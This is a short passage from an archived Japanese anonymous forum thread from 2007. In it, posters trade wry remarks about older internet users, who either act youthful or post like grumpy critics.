若い人に負けじと弾けたり、逆に評論家ぶって悪態つきまくったり。

127 :名無しさん@花束いっぱい。:2007/01/10(水) 04:12:30 ID:v55ACvFK
>逆に評論家ぶって悪態つきまくったり
そういう所って読んでいて疲れるから自然と足が遠のく。

>若い人に負けじと弾けたり
パンダ好きの婆しか思い浮かばないw最近行ってないから知らないけど

128 :名無しさん@花束いっぱい。:2007/01/10(水) 21:40:43 ID:guYNoHww
>126
うわあ・・・
何て的確なんだ


29 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)